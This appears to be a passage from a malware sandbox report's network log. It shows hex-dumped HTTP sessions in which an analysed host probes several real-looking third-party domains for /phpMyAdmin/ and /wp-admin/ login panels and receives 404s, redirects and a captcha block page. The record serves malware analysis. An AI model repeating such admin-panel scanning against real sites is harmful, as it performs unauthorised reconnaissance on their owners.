69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 31 31 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 63 Data Ascii: <!DOCTYPE html><head> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 300; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 300; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Clarkson", sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em; } footer span { margin: 0 11px; font-size: 1em; font-weight: 300; c
Feb 21, 2024 00:26:09.864391088 CET	1276	IN	Data Raw: 6f 6c 6f 72 3a 20 23 61 39 61 39 61 39 3b 0a 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 6e 6f 77 72 61 70 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 Data Ascii: olor: #a9a9a9; white-space: nowrap; } footer span strong { font-weight: 300; color: #191919; } @media (max-width: 600px) { body { font-size: 10px; } } @font-face { font-family: 'Clarkson'; font-
Feb 21, 2024 00:26:09.864455938 CET	1276	IN	Data Raw: 4c 57 58 69 45 6a 6b 6a 50 2f 45 62 4e 73 72 37 4a 58 55 39 6b 62 54 57 76 76 4e 49 74 64 68 59 66 30 56 70 6a 56 43 35 78 36 41 57 48 30 43 6f 70 4a 39 6b 4c 4c 32 46 4d 6f 34 31 75 6f 5a 46 46 49 77 58 30 76 79 48 75 45 6a 48 59 48 32 56 6d 72 Data Ascii: LWXiEjkjP/EbNsr7JXU9kbTWvvNItdhYf0VpjVC5x6AWH0CopJ9kLL2FMo41uoZFFIwX0vyHuEjHYH2VmrxOkqFo0adgxDecFou4ep9oyEd/DYGc3ZB+z+7LZeRzLqapLukxRFwknNZLe1mD3UUryptN0i8agj3nXEkMT3jM6TFgFmSPui9ANP5tgumW+7GL2HT49v6T21zEFSmU/PyRmlIHkbMttrEh8jq70i9RKy000O7s/J2
Feb 21, 2024 00:26:09.864490986 CET	268	IN	Data Raw: 78 71 47 69 48 63 52 46 7a 33 71 43 59 53 35 6f 69 36 56 6e 58 56 63 2b 31 6a 6f 48 35 33 57 4c 6c 77 6a 39 5a 58 78 72 33 37 75 63 66 65 38 35 4b 59 62 53 5a 45 6e 4e 50 71 75 59 51 4c 64 5a 47 75 47 6a 75 6d 36 37 4f 36 76 73 34 70 7a 6e 4e 4e Data Ascii: xqGiHcRFz3qCYS5oi6VnXVc+1joH53WLlwj9ZXxr37ucfe85KYbSZEnNPquYQLdZGuGjum67O6vs4pznNN15fYXFdOLuLWXrsKEmCQSfZo21npOsch0vJ4uwm8gxs1rVFd7xXNcYLdHOA8u6Q+yN/ryi71Hun8adEPitdau1oRoJdRdmo7vWKu+0nK470m8D6uPnOKeCe7xMpwlB3s5Szbpd7HP+rKdvVh6f1F0Y/zD8P1sa53N
Feb 21, 2024 00:26:09.864547968 CET	1276	IN	Data Raw: 34 6c 4d 59 63 71 2b 5a 58 75 5a 73 78 54 49 4d 35 5a 7a 6e 4f 75 49 56 7a 61 6e 45 38 43 58 6a 4f 52 4a 38 38 35 36 67 57 65 63 49 73 37 33 47 34 49 56 61 54 6f 6d 2b 46 64 5a 6d 6b 31 33 69 51 68 5a 70 56 76 77 57 61 65 4a 4a 76 5a 77 6d 5a 66 Data Ascii: 4lMYcq+ZXuZsxTIM5ZznOuIVzanE8CXjORJ8856gWecIs73G4IVaTom+FdZmk13iQhZpVvwWaeJJvZwmZfgLrMEPDsmWSeTP2pgBIVqr44ljnDOc42NDfmKJscRnzjslLu8YD7DeUiQta8q+gTM8UuJgxqs1ltlxGmF3mHRe8w7M6YKbpYWBIZw6abAXoINXCHv8WIYdhau8bWC2V991qxUKLIeS5yocFv2WSejEdfhwp5nBV/y
Feb 21, 2024 00:26:09.864619970 CET	1276	IN	Data Raw: 62 33 6d 5a 31 45 36 68 46 5a 43 4f 74 4a 6d 38 39 4a 38 42 6e 78 37 48 39 43 4d 66 7a 59 41 58 4d 37 66 6d 78 47 73 68 77 4c 6a 56 68 6f 78 30 49 4c 46 71 72 77 35 2b 64 6f 7a 31 4b 74 35 6c 47 73 76 61 68 79 6a 4d 75 52 56 48 49 4e 4b 49 41 53 Data Ascii: b3mZ1E6hFZCOtJm89J8Bnx7H9CMfzYAXM7fmxGshwLjVhox0ILFqrw5+doz1Kt5lGsvahyjMuRVHINKIASaMX6Aaz/zP39dVJaibMTznE8XEmMq8H7zHPYm8ZeF/aKMDTB0O12KY6trbCV4ekxPC26HLAH2M1LTSQ0hyP1ROTBMgNLCwxVMHS4fHg2e2RNqvGnJI340EzbSTZWms3Y345WE1qeFIiJPGPnKHYK2JjCRhQbe7Dxt
Feb 21, 2024 00:26:09.864655018 CET	1276	IN	Data Raw: 4a 49 64 55 67 7a 75 6b 70 63 44 65 4a 72 47 31 62 6d 34 57 73 62 6c 75 59 78 4f 77 31 62 47 7a 77 4c 30 44 74 4c 41 71 42 6c 41 74 30 35 36 4c 61 6a 65 7a 71 36 48 72 5a 50 77 2f 4d 30 39 6b 66 67 47 63 66 7a 42 4f 77 72 79 52 61 56 44 73 36 44 Data Ascii: JIdUgzukpcDeJrG1bm4WsbluYxOw1bGzwL0DtLAqBlAt056Lajezq6HrZPw/M09kfgGcfzBOwryRaVDs6DJQcm6Z8PXsbsd4goAUYk4XLU6HLUiC2fVyfFCeYUc9OUuGlK7uaNENPDxPKgKHrPYD2KRgA0Jz1pdYiVah3ihI8SsbuZ7Qut7FtdT28OepdJALQ9kcuIqJaIlksKpGWQaBJEs5Ro2uE5F6+znJOlnPHleN2O10143
Feb 21, 2024 00:26:09.864686012 CET	1276	IN	Data Raw: 5a 54 6f 6d 2b 43 35 70 6e 6e 30 5a 74 5a 4f 73 63 53 62 64 54 51 5a 49 5a 49 6a 7a 4e 47 71 33 6a 5a 65 59 56 58 71 62 44 42 4b 37 7a 4f 50 76 37 4e 6d 78 7a 6d 4d 43 6f 36 79 78 47 4f 70 71 4a 4c 78 51 45 50 50 38 65 62 6b 68 32 78 6a 78 50 73 Data Ascii: ZTom+C5pnn0ZtZOscSbdTQZIZIjzNGq3jZeYVXqbDBK7zOPv7NmxzmMCo6yxGOpqJLxQEPP8ebkh2xjxPso8Vpyed4bWtGDod5nbfYx2tE9IjIcwqDOQxCLgjqhrjJapxQj5aykZ/KjJyp8vYw2jOkioWHg6QaitbobouivfRYdGlwB0//RiIvIqLJ/al9rsfi5oavS3VijivkmceYKJ2jlOzsy3jzHBrGuPR1YpMFFrB1bJ8us
Feb 21, 2024 00:26:09.864782095 CET	1276	IN	Data Raw: 4b 4b 62 77 45 6d 55 72 39 49 52 64 38 6c 67 73 49 66 2b 75 77 66 68 39 72 73 6a 2f 2f 30 34 7a 38 50 49 39 68 69 6d 33 61 35 51 30 68 41 67 43 76 57 73 45 6c 37 48 4c 47 6b 53 6d 38 78 79 37 34 61 37 52 49 71 32 52 79 68 4c 4c 71 34 76 45 4e 78 Data Ascii: KKbwEmUr9IRd8lgsIf+uwfh9rsj//04z8PI9him3a5Q0hAgCvWsEl7HLGkSm8xy74a7RIq2RyhLLq4vENxWg6Z8OdDn9k/pO8nvZ82B9HQH4suep5bgnoW/t4r+OSsr3KDZZ7hjnjRmpSwWGJ1Rz24Sgbupfrusw+nYg9brZp6vKv2bXV9yNo3FwRf1UmbhULadGRmefHVN7jCO1g05Yzd4bBIOYMOd3ZMy3lBovUZqA+G9Ip1V
Feb 21, 2024 00:26:09.864787102 CET	1276	IN	Data Raw: 57 39 51 6d 2b 6b 37 6b 35 75 59 62 72 75 30 61 4e 30 4a 59 59 52 78 4a 2b 54 49 52 2b 6e 4c 46 4d 64 4f 39 39 63 4f 75 69 69 68 38 46 49 79 73 53 4d 78 4b 7a 59 77 45 59 32 73 59 57 74 62 4f 4d 45 64 72 4b 62 50 65 78 6c 48 77 64 34 48 69 2f 67 Data Ascii: W9Qm+k7k5uYbru0aN0JYYRxJ+TIR+nLFMdO99cOuiih8FIysSMxKzYwEY2sYWtbOMEdrKbPexlHwd4Hi/ghbyIF/MSXuoOf52DHIoeT/J0/wJ3SqRpQnpexxt4N+/hvbyP9ztH3+MHTs4d3Mnd3MuDPMpjQmmVVVe7pmpu5KHLiejRfHs+PruYnKemd+nbnlzBbpT+/sSSBYiT///ekfH78UPEBWNubh73czs77OmucVf3h6/Pn
Feb 21, 2024 00:26:09.955780029 CET	1276	IN	Data Raw: 2f 71 55 5a 5a 48 77 6a 6f 6a 59 54 73 6a 59 66 6d 34 36 56 4d 69 5a 79 64 45 7a 72 5a 48 7a 71 5a 46 7a 72 5a 46 7a 6e 5a 45 7a 72 4b 52 73 33 7a 6b 72 44 74 79 6c 6f 75 63 37 59 36 63 35 53 4e 6e 32 63 68 5a 4c 72 37 35 4d 79 53 4d 55 44 65 44 Data Ascii: /qUZZHwjojYTsjYfm46VMiZydEzrZHzqZFzrZFznZEzrKRs3zkrDtylouc7Y6c5SNn2chZLr75MySMUDeDNMxk2kyDdtPEJJOKxLSMvRjTTD7cnRbuTgp3m8OV6eHKjHBlZrgyK1yZHa7MCVfmhivzwpWOcKUzXOkKV7rDlZ5wpTdc6QtX+sOVgfBjOPwohx9Tw4/28CMXfmTCj9bwoxZ+JOFHMfwYCj9K4ceU8KMt/MiGH+nwo

Session ID	Source IP	Source Port	Destination IP	Destination Port
160	192.168.2.6	57288	185.230.63.186	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:09.784045935 CET	181	OUT	GET /phpmyadmin/ HTTP/1.1 Host: montessorihawaii.org Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:09.918490887 CET	844	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:09 GMT Content-Length: 0 Connection: keep-alive location: https://www.montessorihawaii.org/phpmyadmin strict-transport-security: max-age=3600 x-wix-request-id: 1708471569.8271478443537126612 Age: 0 Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=42 X-Seen-By: VtqAe8Wu9wvSsl49B/X4+ewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLquxVSF9nMFA2iLo/JtJR4Qa0sM5c8dDUFHeNaFq0qDu,2d58ifebGbosy5xc+FRalsTwqU4RI6WEQskWAgsLHFCe3/SScY6ACT7u6aWaxtKZPDFB/0chFXzBP0oLY++gmA==,2UNV7KOq4oGjA5+PKsX47PmOi36p/Q7Ico3sut0FtX4fbJaKSXYQ/lskq2jK6SGP,ttZawIJkYKmjc/NH+jiCcnCQrDd5pCY7L37bT7qLO6U=,esXX8rTfzq2RRUC1xyAPv6D492b3qqr7SqQvqDE7ViE=,/j+AjfLiOiE0Vc9NsP8sK5C483KhHL0nZ8WejdH6PvV3rMRpwhuqafklhVFdC7d9sdHr4zo+FezP22KH3yZA0A== Cache-Control: no-cache X-Content-Type-Options: nosniff

Session ID	Source IP	Source Port	Destination IP	Destination Port
161	192.168.2.6	57208	217.160.0.179	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:09.818151951 CET	170	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: upblue.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:10.111788988 CET	567	IN	HTTP/1.1 200 OK Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Keep-Alive: timeout=15 Date: Tue, 20 Feb 2024 23:26:09 GMT Server: Apache Content-Encoding: gzip Data Raw: 31 36 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 91 4f 4f 84 30 10 c5 ef 26 7e 87 b1 89 47 18 c8 7a 30 4a 49 74 ff 44 93 5d dd 18 36 ea 91 a5 5d 21 02 ad a5 88 f8 e9 a5 dd 12 b9 98 c8 a5 65 f2 66 e6 f7 5e a3 b3 c5 e3 3c 79 dd 2e 21 d7 55 09 db dd ed fa 7e 0e c4 43 7c 9e cd 11 17 c9 02 5e ee 92 cd 1a 42 3f 80 95 4a 2b de 70 8d b8 7c 20 40 72 ad e5 15 62 d7 75 7e 37 f3 85 7a c3 e4 09 bf cc 9c d0 34 ba ab 77 70 5d 3e d3 8c c4 a7 27 91 51 d8 93 a7 cc 9c ba d0 25 8f 5b 09 fb b2 e5 11 1e 7f 87 7a c5 75 0a f5 b0 92 92 77 de 77 42 b1 86 40 26 6a cd 6b 4d 09 01 34 cd 13 11 e3 4d a6 0a a9 0b 51 ff a1 33 c4 1e ff 68 8b 4f 4a dc 20 4f f7 92 4f e4 9a 7f 69 34 84 d7 90 e5 a9 1a dc d2 5d b2 f2 2e dd 3a cc 1d f4 e8 0a 94 e8 1a 4a c2 20 38 b7 e6 6c 1d 1a 95 51 9b 4f 33 04 d4 4a 63 cc bf 28 8b 2a f5 19 47 94 b9 dc f4 37 ac 2a 6a 24 60 ed 52 e2 ec 13 b0 03 f6 83 59 ae 28 09 08 d4 42 f1 a6 f8 1e 42 18 6f c4 1a af c5 11 c1 84 b0 17 ac b7 89 86 bf 31 e6 a1 a9 c8 38 4a 21 57 fc f0 4f 9c d8 3d aa 63 1e 68 27 b0 11 a6 31 98 2f 42 69 86 e3 b8 17 a7 30 38 46 63 25 f6 b1 7f 00 c6 8c 89 ed 66 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 166OO0&~Gz0JItD]6]!ef^<y.!U~C\|^B?J+p\| @rbu~7z4wp]>'Q%[zuwwB@&jkM4MQ3hOJ OOi4].:J 8lQO3Jc(G7j$`RY(BBo18J!WO=ch'1/Bi08Fc%f0

Session ID	Source IP	Source Port	Destination IP	Destination Port
162	192.168.2.6	57266	91.136.8.144	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:09.839449883 CET	172	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: derbyron.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:10.007414103 CET	173	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:09 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 21 Connection: keep-alive Data Raw: 4e 6f 74 20 46 6f 75 6e 64 20 5b 43 46 4e 20 23 30 30 30 35 5d Data Ascii: Not Found [CFN #0005]

Session ID	Source IP	Source Port	Destination IP	Destination Port
163	192.168.2.6	57247	78.47.2.70	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:09.842473984 CET	183	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: breecetechnology.co.za Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:10.029607058 CET	413	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:09 GMT Server: Apache Content-Length: 268 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 62 72 65 65 63 65 74 65 63 68 6e 6f 6c 6f 67 79 2e 63 6f 2e 7a 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at breecetechnology.co.za Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
164	192.168.2.6	57217	86.107.32.28	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:09.845359087 CET	216	OUT	GET /wp-admin/ HTTP/1.1 Host: collevilca.it Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: http://collevilca.it/wp-login.php
Feb 21, 2024 00:26:10.033338070 CET	1286	IN	HTTP/1.1 403 Forbidden Content-Type: text/html Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Server: BitNinja Captcha Server Date: Tue, 20 Feb 2024 23:26:09 GMT Content-Length: 13691 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6a 6f 6f 6d 6c 61 2c 20 4a 6f 6f 6d 6c 61 2c 20 6a 6f 6f 6d 6c 61 20 31 2e 35 2c 20 77 6f 72 64 70 72 65 73 73 20 32 2e 35 2c 20 44 72 75 70 61 6c 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4a 6f 6f 6d 6c 61 21 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4a 6f 6f 6d 6c 61 21 20 31 2e 35 20 2d 20 4f 70 65 6e 20 53 6f 75 72 63 65 20 43 6f 6e 74 65 6e 74 20 4d 61 6e 61 67 65 6d 65 6e 74 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 57 6f 72 64 50 72 65 73 73 20 32 2e 35 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 57 61 69 74 69 6e 67 20 66 6f 72 20 74 68 65 20 72 65 64 69 72 65 63 74 69 72 6f 6e 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 20 7b 77 69 64 74 68 3a 20 31 30 30 25 3b 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 20 6d 61 72 67 69 6e 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 70 61 6e 20 7b 63 6f 6c 6f 72 3a 20 23 38 37 38 37 38 37 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 74 3b 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 63 6f 6c 6f 72 3a 20 23 38 37 38 37 38 37 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 74 3b 20 74 65 78 74 2d 61 6c 69 Data Ascii: <!DOCTYPE HTML><html lang="en-US"> <head> <meta charset="UTF-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta name="robots" content="noindex, nofollow" /><meta name="keywords" content="joomla, Joomla, joomla 1.5, wordpress 2.5, Drupal" /><meta name="description" content="Joomla!" /><meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /><meta name="generator" content="WordPress 2.5" /> <meta http-equiv="Content-Type" content="text/html;charset=UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" /> <title>Waiting for the redirectiron...</title> <style type="text/css"> body {background-color: #ffffff; font-family: "Helvetica Neue", Helvetica,Arial,sans-serif;} html, body {width: 100%; height: 100%; margin: 0; padding: 0;} span {color: #878787; font-size: 12pt; text-align: center;} h1 {color: #878787; font-size: 18pt; text-ali
Feb 21, 2024 00:26:10.033380032 CET	1286	IN	Data Raw: 67 6e 3a 20 63 65 6e 74 65 72 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 6c 69 6e 6b 20 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 34 30 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 73 6b 2d 63 69 72 63 6c 65 20 7b 6d 61 72 67 69 6e 3a Data Ascii: gn: center;} .link {margin-top: 40px;} .sk-circle {margin: 80px auto;width: 100px;height: 100px;position: relative;} .sk-circle .sk-child {width: 100%;height: 100%;position: absolute;left: 0;top: 0;}
Feb 21, 2024 00:26:10.033550024 CET	1286	IN	Data Raw: 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 73 6b 2d 63 69 72 63 6c 65 20 2e 73 6b 2d 63 69 72 63 6c 65 38 20 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 32 31 30 64 65 67 29 3b 2d 6d 73 2d 74 72 61 6e 73 Data Ascii: } .sk-circle .sk-circle8 {-webkit-transform: rotate(210deg);-ms-transform: rotate(210deg);transform: rotate(210deg); } .sk-circle .sk-circle9 {-webkit-transform: rotate(240deg);-ms-transform: rotate(240deg);transform:
Feb 21, 2024 00:26:10.033690929 CET	1286	IN	Data Raw: 72 65 20 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 20 2d 30 2e 35 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 20 2d 30 2e 35 73 3b 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 73 6b 2d 63 69 72 63 6c Data Ascii: re {-webkit-animation-delay: -0.5s;animation-delay: -0.5s; } .sk-circle .sk-circle9:before {-webkit-animation-delay: -0.4s;animation-delay: -0.4s; } .sk-circle .sk-circle10:before {-webkit-animation-delay: -0.3s;animati
Feb 21, 2024 00:26:10.033713102 CET	1286	IN	Data Raw: 20 20 20 7d 2c 20 31 30 30 30 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 62 72 6f 77 73 65 72 49 6e 74 65 67 72 69 74 79 43 68 65 63 6b 28 29 20 7b 0a 20 20 20 20 20 20 20 20 Data Ascii: }, 1000); } function browserIntegrityCheck() { w = window.innerWidth; h = window.innerHeight; arr = [w, h, Math.floor((Math.random() * 9) + 1)]; arr.pus
